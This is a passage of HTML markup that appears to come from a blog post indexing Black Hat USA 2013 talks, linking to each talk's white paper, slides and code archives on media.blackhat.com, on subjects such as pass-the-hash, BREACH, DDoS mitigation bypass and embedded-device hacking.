href="https://media.blackhat.com/us-13/US-13-Forner-Out-of-Control-Demonstrating-SCADA-WP.pdf"&gt;US-13-Forner-Out-of-Control-Demonstrating-SCADA-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Forner-Out-of-Control-Demonstrating-SCADA-Slides.pdf"&gt;US-13-Forner-Out-of-Control-Demonstrating-SCADA-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Owning the Routing Table – Part II &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Nakibly-Owning-the-Routing-Table-Part-II-WP.pdf"&gt;US-13-Nakibly-Owning-the-Routing-Table-Part-II-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Nakibly-Owning-the-Routing-Table-Part-II-Slides.pdf"&gt;US-13-Nakibly-Owning-the-Routing-Table-Part-II-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Pass-The-Hash 2: The Admin’s Revenge &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Duckwall-Pass-the-Hash-WP.pdf"&gt;US-13-Duckwall-Pass-the-Hash-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Duckwall-Pass-the-Hash-Slides.pdf"&gt;US-13-Duckwall-Pass-the-Hash-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Duckwall-Pass-The-Hash-2-The-Admins-Revenge-Code.zip"&gt;US-13-Duckwall-Pass-The-Hash-2-The-Admins-Revenge-Code.zip&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Pixel Perfect Timing Attacks with HTML5 &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Stone-Pixel-Perfect-Timing-Attacks-with-HTML5-WP.pdf"&gt;US-13-Stone-Pixel-Perfect-Timing-Attacks-with-HTML5-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Post Exploitation Operations with Cloud Synchronization Services &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Williams-Post-Exploitation-Operations-with-Cloud-Synchronization-Services-WP.pdf"&gt;US-13-Williams-Post-Exploitation-Operations-with-Cloud-Synchronization-Services-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Williams-Post-Exploitation-Operations-with-Cloud-Synchronization-Services-Slides.pdf"&gt;US-13-Williams-Post-Exploitation-Operations-with-Cloud-Synchronization-Services-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Power Analysis Attacks for Cheapskates &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-OFlynn-Power-Analysis-Attacks-for-Cheapskates-WP.pdf"&gt;US-13-OFlynn-Power-Analysis-Attacks-for-Cheapskates-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-OFlynn-Power-Analysis-Attacks-for-Cheapskates-Slides.pdf"&gt;US-13-OFlynn-Power-Analysis-Attacks-for-Cheapskates-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Predicting Susceptibility to Social Bots on Twitter &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Sumner-Predicting-Susceptibility-to-Social-Bots-on-Twitter-Slides.pdf"&gt;US-13-Sumner-Predicting-Susceptibility-to-Social-Bots-on-Twitter-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Press ROOT to continue: Detecting OSX and Windows bootkits with RDFU &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Vuksan-Press-ROOT-to-Continue-Detecting-MacOS-and-Windows-Bootkits-with-RDFU-WP.pdf"&gt;US-13-Vuksan-Press-ROOT-to-Continue-Detecting-MacOS-and-Windows-Bootkits-with-RDFU-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Vuksan-Press-ROOT-to-Continue-Detecting-MacOS-and-Windows-Bootkits-with-RDFU-Slides.pdf"&gt;US-13-Vuksan-Press-ROOT-to-Continue-Detecting-MacOS-and-Windows-Bootkits-with-RDFU-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Revealing Embedded Fingerprints: Deriving intelligence from USB stack interactions &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Davis-Deriving-Intelligence-From-USB-Stack-Interactions-Slides.pdf"&gt;US-13-Davis-Deriving-Intelligence-From-USB-Stack-Interactions-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;RFID Hacking: Live Free or RFID Hard &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Brown-RFID-Hacking-Live-Free-or-RFID-Hard-Slides.pdf"&gt;US-13-Brown-RFID-Hacking-Live-Free-or-RFID-Hard-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Brown-RFID-Hacking-Live-Free-or-RFID-Hard-Code.zip"&gt;US-13-Brown-RFID-Hacking-Live-Free-or-RFID-Hard-Code.zip&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;The SCADA That Didn’t Cry Wolf- Who’s Really Attacking Your ICS Devices- Part Deux! &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Wilhoit-The-SCADA-That-Didnt-Cry-Wolf-Whos-Really-Attacking-Your-ICS-Devices-Slides.pdf"&gt;US-13-Wilhoit-The-SCADA-That-Didnt-Cry-Wolf-Whos-Really-Attacking-Your-ICS-Devices-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Smashing The Font Scaler Engine in Windows Kernel &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Chan-Smashing-The-Font-Scaler-Engine-in-Windows-Kernel-WP.pdf"&gt;US-13-Chan-Smashing-The-Font-Scaler-Engine-in-Windows-Kernel-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Chan-Smashing-The-Font-Scaler-Engine-in-Windows-Kernel-Slides.pdf"&gt;US-13-Chan-Smashing-The-Font-Scaler-Engine-in-Windows-Kernel-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;SSL, gone in 30 seconds – a BREACH beyond CRIME &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Prado-SSL-Gone-in-30-seconds-A-BREACH-beyond-CRIME-WP.pdf"&gt;US-13-Prado-SSL-Gone-in-30-seconds-A-BREACH-beyond-CRIME-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Prado-SSL-Gone-in-30-seconds-A-BREACH-beyond-CRIME-Slides.pdf"&gt;US-13-Prado-SSL-Gone-in-30-seconds-A-BREACH-beyond-CRIME-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;TLS ‘secrets’ &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Daigniere-TLS-Secrets-WP.pdf"&gt;US-13-Daigniere-TLS-Secrets-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Daigniere-TLS-Secrets-Slides.pdf"&gt;US-13-Daigniere-TLS-Secrets-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;UART THOU MAD? &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Kohlenberg-UART-Thou-Mad-WP.pdf"&gt;US-13-Kohlenberg-UART-Thou-Mad-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Kohlenberg-UART-Thou-Mad-Slides.pdf"&gt;US-13-Kohlenberg-UART-Thou-Mad-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Universal DDoS Mitigation Bypass &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Lee-Universal-DDoS-Mitigation-Bypass-WP.pdf"&gt;US-13-Lee-Universal-DDoS-Mitigation-Bypass-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Lee-Universal-DDoS-Mitigation-Bypass-Slides.pdf"&gt;US-13-Lee-Universal-DDoS-Mitigation-Bypass-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Lee-Universal-DDoS-Mitigation-Bypass-Code.zip"&gt;US-13-Lee-Universal-DDoS-Mitigation-Bypass-Code.zip&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;USING ONLINE ACTIVITY AS DIGITAL FINGERPRINTS TO CREATE A BETTER SPEAR PHISHER &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Espinhara-Using-Online-Activity-As-Digital-Fingerprints-WP.pdf"&gt;US-13-Espinhara-Using-Online-Activity-As-Digital-Fingerprints-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Espinhara-Using-Online-Activity-As-Digital-Fingerprints-Slides.pdf"&gt;US-13-Espinhara-Using-Online-Activity-As-Digital-Fingerprints-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Virtual Deobfuscator – a DARPA Cyber Fast Track funded effort &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Raber-Virtual-Deobfuscator-A-DARPA-Cyber-Fast-Track-Funded-Effort-WP.pdf"&gt;US-13-Raber-Virtual-Deobfuscator-A-DARPA-Cyber-Fast-Track-Funded-Effort-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Raber-Virtual-Deobfuscator-A-DARPA-Cyber-Fast-Track-Funded-Effort-Slides.pdf"&gt;US-13-Raber-Virtual-Deobfuscator-A-DARPA-Cyber-Fast-Track-Funded-Effort-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Raber-Virtual-Deobfuscator-A-DARPA-Cyber-Fast-Track-Funded-Effort-Code.zip"&gt;US-13-Raber-Virtual-Deobfuscator-A-DARPA-Cyber-Fast-Track-Funded-Effort-Code.zip&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;What’s on the Wire? Physical Layer Tapping with Project Daisho &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Spill-Whats-on-the-Wire-WP.pdf"&gt;US-13-Spill-Whats-on-the-Wire-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Spill-Whats-on-the-Wire-Slides.pdf"&gt;US-13-Spill-Whats-on-the-Wire-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;With BIGDATA comes BIG responsibility: Practical exploiting of MDX injections &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Chastuhin-With-BIGDATA-comes-BIG-responsibility-WP.pdf"&gt;US-13-Chastuhin-With-BIGDATA-comes-BIG-responsibility-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Chastuhin-With-BIGDATA-comes-BIG-responsibility-Slides.pdf"&gt;US-13-Chastuhin-With-BIGDATA-comes-BIG-responsibility-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;‘) UNION SELECT `This_Talk` AS (‘New Optimization and Obfuscation Techniques’) &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-WP.pdf"&gt;US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf"&gt;US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Embedded Devices Security and Firmware Reverse Engineering &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Zaddach-Workshop-on-Embedded-Devices-Security-and-Firmware-Reverse-Engineering-WP.pdf"&gt;US-13-Zaddach-Workshop-on-Embedded-Devices-Security-and-Firmware-Reverse-Engineering-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Zaddach-Workshop-on-Embedded-Devices-Security-and-Firmware-Reverse-Engineering-Slides.pdf"&gt;US-13-Zaddach-Workshop-on-Embedded-Devices-Security-and-Firmware-Reverse-Engineering-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;JTAGulator: Assisted discovery of on-chip debug interfaces &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Grand-JTAGulator-Assisted-Discovery-of-On-Chip-Debug-Interfaces-Slides.pdf"&gt;US-13-Grand-JTAGulator-Assisted-Discovery-of-On-Chip-Debug-Interfaces-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Grand-JTAGulator-Assisted-Discovery-of-On-Chip-Debug-Interfaces-Code.zip"&gt;US-13-Grand-JTAGulator-Assisted-Discovery-of-On-Chip-Debug-Interfaces-Code.zip&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Methodologies for Hacking Embedded Security Appliances &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Bathurst-Methodologies-for-Hacking-Embdded-Security-Appliances-Slides.pdf"&gt;US-13-Bathurst-Methodologies-for-Hacking-Embdded-Security-Appliances-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Mo Malware Mo Problems – Cuckoo Sandbox to the rescue &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Bremer-Mo-Malware-Mo-Problems-Cuckoo-Sandbox-WP.pdf"&gt;US-13-Bremer-Mo-Malware-Mo-Problems-Cuckoo-Sandbox-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Bremer-Mo-Malware-Mo-Problems-Cuckoo-Sandbox-Slides.pdf"&gt;US-13-Bremer-Mo-Malware-Mo-Problems-Cuckoo-Sandbox-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;PDF Attack: A Journey from the Exploit Kit to the shellcode &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Esparza-PDF-Attack-A-journey-from-the-Exploit-Kit-Slides.pdf"&gt;US-13-Esparza-PDF-Attack-A-journey-from-the-Exploit-Kit-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Esparza-PDF-Attack-A-journey-from-the-Exploit-Kit-Slides-Source.zip"&gt;US-13-Esparza-PDF-Attack-A-journey-from-the-Exploit-Kit-Slides-Source.zip&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Practical Pentesting of ERPs and Business Applications &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Polyakov-Practical-Pentesting-of-ERPs-and-Business-Applications-WP.pdf"&gt;US-13-Polyakov-Practical-Pentesting-of-ERPs-and-Business-Applications-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Polyakov-Practical-Pentesting-of-ERPs-and-Business-Applications-Slides.pdf"&gt;US-13-Polyakov-Practical-Pentesting-of-ERPs-and-Business-Applications-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Abusing Web APIs Through Scripted Android Applications &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Peck-Abusing-Web-APIs-Through-Scripted-Android-Applications-WP.pdf"&gt;US-13-Peck-Abusing-Web-APIs-Through-Scripted-Android-Applications-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Peck-Abusing-Web-APIs-Through-Scripted-Android-Applications-Slides.pdf"&gt;US-13-Peck-Abusing-Web-APIs-Through-Scripted-Android-Applications-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Beyond the Application: Cellular Privacy Regulation Space &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Dudley-Beyond-the-Application-Cellular-Privacy-Regulatory-Space-WP.pdf"&gt;US-13-Dudley-Beyond-the-Application-Cellular-Privacy-Regulatory-Space-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Dudley-Beyond-the-Application-Cellular-Privacy-Regulatory-Space-Slides.pdf"&gt;US-13-Dudley-Beyond-the-Application-Cellular-Privacy-Regulatory-Space-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Clickjacking Revisited: A Perceptual View of UI Security &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Akhawe-Clickjacking-Revisited-A-Perceptual-View-of-UI-Security-Slides.pdf"&gt;US-13-Akhawe-Clickjacking-Revisited-A-Perceptual-View-of-UI-Security-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;CMX: IEEE Clean File Metadata Exchange &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Kennedy-CMX-IEEE-Clean-File-Metadata-Exchange-WP.pdf"&gt;US-13-Kennedy-CMX-IEEE-Clean-File-Metadata-Exchange-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;CrowdSource: An Open Source, Crowd Trained Machine Learning Model for Malware Capability Detection &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Saxe-CrowdSource-An-Open-Source-Crowd-Trained-Machine-Learning-Model-Slides.pdf"&gt;US-13-Saxe-CrowdSource-An-Open-Source-Crowd-Trained-Machine-Learning-Model-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Denial of Service as a Service – asymmetrical warfare at its finest &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Masse-Denial-of-Service-as-a-Service-Slides.pdf"&gt;US-13-Masse-Denial-of-Service-as-a-Service-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Denying service to DDOS protection services &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Nixon-Denying-Service-to-DDOS-Protection-Services-WP.pdf"&gt;US-13-Nixon-Denying-Service-to-DDOS-Protection-Services-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Nixon-Denying-Service-to-DDOS-Protection-Services-Slides.pdf"&gt;US-13-Nixon-Denying-Service-to-DDOS-Protection-Services-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;LTE BOOMS WITH VULNERABILITIES &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Gupta-LTE-Booms-withVulnerabilities-WP.pdf"&gt;US-13-Gupta-LTE-Booms-withVulnerabilities-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Malicious File for Exploiting Forensic Software &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a 